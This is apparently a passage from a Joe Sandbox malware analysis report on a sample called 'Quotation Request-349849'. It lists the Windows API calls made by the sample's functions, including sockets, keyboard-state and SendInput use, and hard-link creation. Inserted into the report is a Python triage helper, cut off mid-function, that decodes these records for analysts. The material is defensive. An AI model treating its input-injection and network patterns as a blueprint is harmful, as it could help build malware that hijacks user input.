                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 32d9744076d78ea173f4ee6b1b1433aa330240b826eb0fade1711a664f23c1dc
                                                      • Instruction ID: 40e67888d78703fe4c91a5cc351cacd570b967b05a78d07e4f204507c0f54dbf
                                                      • Opcode Fuzzy Hash: 32d9744076d78ea173f4ee6b1b1433aa330240b826eb0fade1711a664f23c1dc
                                                      • Instruction Fuzzy Hash: E1A12475604705DFCB10DF64C885A2AB7E4FF89754F044459FA969B3A2CB34ED05CB82
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00862C7C,?), ref: 008276EA
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00862C7C,?), ref: 00827702
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0085FB80,000000FF,?,00000000,00000800,00000000,?,00862C7C,?), ref: 00827727
                                                      • _memcmp.LIBCMT ref: 00827748
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 6998d0a23e2c1bda4dacaf033a15a5841336abfd20be9e4d44deded78fcbb892
                                                      • Instruction ID: 11eba07d87b862e23d3b348d2ca9916fe9bc6ce03eae76d00429d6ffa70802cb
                                                      • Opcode Fuzzy Hash: 6998d0a23e2c1bda4dacaf033a15a5841336abfd20be9e4d44deded78fcbb892
                                                      • Instruction Fuzzy Hash: B0812D71A00119EFCB04DFA4C984EEEB7B9FF89315F204158E505EB250DB71AE46CB60
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: 4e104898179bf0b0c128185f6e17aa7dc2eb5956a4fd4298fc30b90c94fd329f
                                                      • Instruction ID: b95cd96717be1e18545b47ac5f8836acb8de45b50785ca1b89ac2e3276181ad5
                                                      • Opcode Fuzzy Hash: 4e104898179bf0b0c128185f6e17aa7dc2eb5956a4fd4298fc30b90c94fd329f
                                                      • Instruction Fuzzy Hash: 015191747003259BDB24AF69E4A5A2AB7A5FF44314F20C81FE586DB291EA74D8E08701
                                                      APIs
                                                      • GetWindowRect.USER32(0154D798,?), ref: 00859863
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00859896
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00859903
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: de9e5c6c4f835d476356f78841718fc4716dfd2395282beb8cb31279c7cfd6a8
                                                      • Instruction ID: 5975cd0234ede0b8d12b7474081d58c08559f26b207377690b85a17f93dc9da0
                                                      • Opcode Fuzzy Hash: de9e5c6c4f835d476356f78841718fc4716dfd2395282beb8cb31279c7cfd6a8
                                                      • Instruction Fuzzy Hash: 0A512E34A00209EFCF10DF54C984AAE7BB5FF55361F148169F9A5EB2A0D731AD45CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00829AD2
                                                      • __itow.LIBCMT ref: 00829B03
                                                        • Part of subcall function 00829D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00829DBE
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00829B6C
                                                      • __itow.LIBCMT ref: 00829BC3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: c61116411070589fea9228ae6b04f6c9f555391cbd7c857eba66abdd24ec9fd2
                                                      • Instruction ID: ff0be56e9094d0d71d28ef79d3806908a7a77ba4d2a737ece7283b540d35d7e4
                                                      • Opcode Fuzzy Hash: c61116411070589fea9228ae6b04f6c9f555391cbd7c857eba66abdd24ec9fd2
                                                      • Instruction Fuzzy Hash: 85417170A00228ABDF15EF54E849BFE7BB9FF44720F00006AF949A7391DB749984CB61
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 008469D1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008469E1
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                       • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00846A45 [wsock32 ordinal 21 = setsockopt; level 0xFFFF = SOL_SOCKET, option 0x20 = SO_BROADCAST]
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846A51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 5c62046faa447652cdb62907759e8e22e89e5a72011dfd799e0e23909a5558d3
                                                      • Instruction ID: a16774ea866c0100045360bfba6d2feda42ad1dbd91b6d1e2555e1f6174e4b78
                                                      • Opcode Fuzzy Hash: 5c62046faa447652cdb62907759e8e22e89e5a72011dfd799e0e23909a5558d3
                                                      • Instruction Fuzzy Hash: 7341A375740210AFEB50AF28CC8AF3977A5EF09B14F048059FA59DF3C2DA789D008752
                                                      APIs
                                                       • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0085F910), ref: 008464A7 [wsock32 ordinal 16 = recv]
                                                      • _strlen.LIBCMT ref: 008464D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 9459a2f73a87c1ef67bf360717e77cf55b6078c58ffb4529683984b16b5dab38
                                                      • Instruction ID: 535801020f0eec20b89c865744978ccf349417387013ab27df6debfa9441a94e
                                                      • Opcode Fuzzy Hash: 9459a2f73a87c1ef67bf360717e77cf55b6078c58ffb4529683984b16b5dab38
                                                      • Instruction Fuzzy Hash: 6B419F71A00108ABCB14EBA8EC99EBEB7B8FF45310F118156F919D7392EB34AD14CB51
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0083B89E
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0083B8C4
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0083B8E9
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0083B915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 7e38da8b5512603887a5db855d5a8b51d3e6ab26a10867766891d9c6f7ca2263
                                                      • Instruction ID: 77c5c55003e59e9559497960f3aa3cd706229e71a5fa2f60e549a154dafd8cc1
                                                      • Opcode Fuzzy Hash: 7e38da8b5512603887a5db855d5a8b51d3e6ab26a10867766891d9c6f7ca2263
                                                      • Instruction Fuzzy Hash: C241F779A00650DFCB10EF15C489A59BBB1FF89710F098099EE4A9B362CB34ED01DB91
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008588DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: a4c301a00ddc50ed66955068d07f2b257989fad323f573ab795043c83570b488
                                                      • Instruction ID: 40b814fbd2765272d189e293d3cd2185c5ccd1cca26404f6301ad35e6ef0e3ae
                                                      • Opcode Fuzzy Hash: a4c301a00ddc50ed66955068d07f2b257989fad323f573ab795043c83570b488
                                                      • Instruction Fuzzy Hash: B231A134600108EFEF219A68CC45BB97BA5FB05352FA44123FE51F62A1CE71A9489B93
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0085AB60
                                                      • GetWindowRect.USER32(?,?), ref: 0085ABD6
                                                      • PtInRect.USER32(?,?,0085C014), ref: 0085ABE6
                                                      • MessageBeep.USER32(00000000), ref: 0085AC57
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 8c30516f3c45673e79f0b771b2d53aa62f2b88de737700a14e983241ac4f3af2
                                                      • Instruction ID: 53afa000ff74f4cd9beb9cee108d1e522c6278fe0cce656fecbe5e12d35f510b
                                                      • Opcode Fuzzy Hash: 8c30516f3c45673e79f0b771b2d53aa62f2b88de737700a14e983241ac4f3af2
                                                      • Instruction Fuzzy Hash: 2F418C30600219DFCF1ADF58C8C4A697BF5FF49312F1882A9E955DB261D731AC49CB92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00830B27
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00830B43
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00830BA9
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00830BFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
                                                      • Instruction ID: 661cd4fed5e2b998e2d16ccf84c15e430766d204b8267bb0cfc8b0fcc09bceaa
                                                      • Opcode Fuzzy Hash: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
                                                      • Instruction Fuzzy Hash: 0A313B709442186EFB308B698C15BFAFBA5FB85339F04425AF581D11D1C37489819BD1
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00830C66
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00830C82
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00830CE1
                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00830D33
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
                                                      • Instruction ID: de95e282f233e986fd05c2182dae92c8478d52515287a542b55d505400d71c2e
                                                      • Opcode Fuzzy Hash: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
                                                      • Instruction Fuzzy Hash: 273124309002186EFF308B6888247FEBBA6FB85311F14536AE581D21D2D3799986CBD2
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008061FB
                                                      • __isleadbyte_l.LIBCMT ref: 00806229
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00806257
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0080628D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 18a1ebcfc84c06ea985e5b8d5abced5268e6f888cf54d5c08b47c1f8ee102a8f
                                                      • Instruction ID: 654ea705375859294989b96c8ee8ece6ee5e1c72dae849640cde881b3ae9ae81
                                                      • Opcode Fuzzy Hash: 18a1ebcfc84c06ea985e5b8d5abced5268e6f888cf54d5c08b47c1f8ee102a8f
                                                      • Instruction Fuzzy Hash: B5318E3160424AEFEB619F65CC48BBA7BA9FF42310F154129E864D71E1E731D970DB90
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00854F02
                                                        • Part of subcall function 00833641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083365B
                                                        • Part of subcall function 00833641: GetCurrentThreadId.KERNEL32 ref: 00833662
                                                        • Part of subcall function 00833641: AttachThreadInput.USER32(00000000,?,00835005), ref: 00833669
                                                      • GetCaretPos.USER32(?), ref: 00854F13
                                                      • ClientToScreen.USER32(00000000,?), ref: 00854F4E
                                                      • GetForegroundWindow.USER32 ref: 00854F54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: e7f209371980f8d427155e4a1a0373733877013542bfa6850d92efa10bfd20a4
                                                      • Instruction ID: 8687a9931f19811a57422e498d478046da45aa8860a552a27018e2bc4057d19f
                                                      • Opcode Fuzzy Hash: e7f209371980f8d427155e4a1a0373733877013542bfa6850d92efa10bfd20a4
                                                      • Instruction Fuzzy Hash: 71311E71D00208AFDB00EFA9C8859EFB7FDFF98304F10406AE515E7241EA759E458BA1
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetCursorPos.USER32(?), ref: 0085C4D2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0080B9AB,?,?,?,?,?), ref: 0085C4E7
                                                      • GetCursorPos.USER32(?), ref: 0085C534
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0080B9AB,?,?,?), ref: 0085C56E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 0c3e8a1fa84488629c4cf539acaaa0abfb53aa0e02f73941c18c10676e1e730e
                                                      • Instruction ID: ff99ec5efb0cd6c19175ef5703fa8618af2aa77d2c2d1a4a4d72f0c7e3be16f5
                                                      • Opcode Fuzzy Hash: 0c3e8a1fa84488629c4cf539acaaa0abfb53aa0e02f73941c18c10676e1e730e
                                                      • Instruction Fuzzy Hash: 7831EE35600618EFCF229F98C858EAA7BB5FB09312F044069FD05CB262D735AD58DFA4
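The socket, SetKeyboardState/SendInput and GetTokenInformation records in this listing are easier to read once the raw hex arguments and the WSOCK32 ordinal imports are decoded. The following Python helper is an added example and is not part of the Joe Sandbox report or its tooling: it parses the "APIs" record format shown on this page (bullet lines with an optional "Part of subcall function" prefix and a trailing "ref:" address), resolves wsock32.dll ordinals and a few well-known Winsock, window-message and TOKEN_INFORMATION_CLASS constants from their standard Windows values, and flags the API combinations a triage analyst would look at first. The sample input is a handful of lines copied from the listing above; the finding labels and the `triage` heuristics are the example's own, not anything the sandbox emits.

```python
"""Added triage helper (not from the Joe Sandbox report): parse its "APIs"
records, decode well-known constants and WSOCK32 ordinals, flag combinations."""
import re
from dataclasses import dataclass
from typing import Optional

# Standard Windows values: wsock32.dll export ordinals, TOKEN_INFORMATION_CLASS, window messages.
WSOCK32_ORDINALS = {2: "bind", 4: "connect", 16: "recv", 19: "send",
                    20: "sendto", 21: "setsockopt", 23: "socket"}
TOKEN_INFO_CLASS = {1: "TokenUser", 3: "TokenPrivileges", 20: "TokenElevation",
                    25: "TokenIntegrityLevel"}
WINDOW_MSG = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR"}
AF_INET, SOCK_DGRAM, IPPROTO_UDP, SOL_SOCKET, SO_BROADCAST = 2, 2, 0x11, 0xFFFF, 0x20

# Constructed sample: lines copied from the function listing on this page.
# Note the sandbox's "(TokenIntegrityLevel)" label on class 3; 3 is TokenPrivileges
# (TokenIntegrityLevel is 25), so the decoder trusts the number, not the label.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 008469D1
• WSAGetLastError.WSOCK32(00000000), ref: 008469E1
  • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00846A45
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00830B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00830B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00830BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00830BFB
APIs
  • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828121
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008286A3
• _memcmp.LIBCMT ref: 008286C6
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?[\w:]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*(?:\([^)]*\)[^)]*)*)\))?"   # one level of "(label)" nesting in args
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str                   # resolved name ("#21" on WSOCK32 becomes "setsockopt")
    module: str
    args: list                  # int for hex values, None for "?", str for anything else
    ref: str                    # call-site address
    subcall_of: Optional[str]   # callee address when the line is "Part of subcall function"


def _parse_arg(tok):
    tok = re.sub(r"\(.*?\)", "", tok).strip()    # drop tool annotations such as "(TokenIntegrityLevel)"
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_listing(text):
    """Return one list of ApiCall per 'APIs' header, in listing order."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = LINE_RE.match(line)
        if not m or current is None:
            continue
        name, mod = m.group("name"), m.group("mod")
        if name.startswith("#") and mod.upper() == "WSOCK32":
            name = WSOCK32_ORDINALS.get(int(name[1:]), name)
        args = [] if m.group("args") is None else [_parse_arg(a) for a in m.group("args").split(",")]
        current.append(ApiCall(name, mod, args, m.group("ref"), m.group("sub")))
    return records


def triage(records):
    """Heuristic findings as (address, text) tuples; the labels are this example's own."""
    out = []
    for rec in records:
        names = {c.name for c in rec}
        for c in rec:
            a = c.args
            if c.name == "socket" and a[:3] == [AF_INET, SOCK_DGRAM, IPPROTO_UDP]:
                out.append((c.ref, "socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP): UDP socket"))
            if c.name == "setsockopt" and len(a) > 2 and a[1] == SOL_SOCKET and a[2] == SO_BROADCAST:
                out.append((c.ref, "setsockopt(SOL_SOCKET, SO_BROADCAST)"))
            if c.name == "PostMessageW" and len(a) > 1 and a[1] in WINDOW_MSG:
                out.append((c.ref, f"PostMessageW posts {WINDOW_MSG[a[1]]}"))
            if c.name == "GetTokenInformation" and len(a) > 1 and a[1] in TOKEN_INFO_CLASS:
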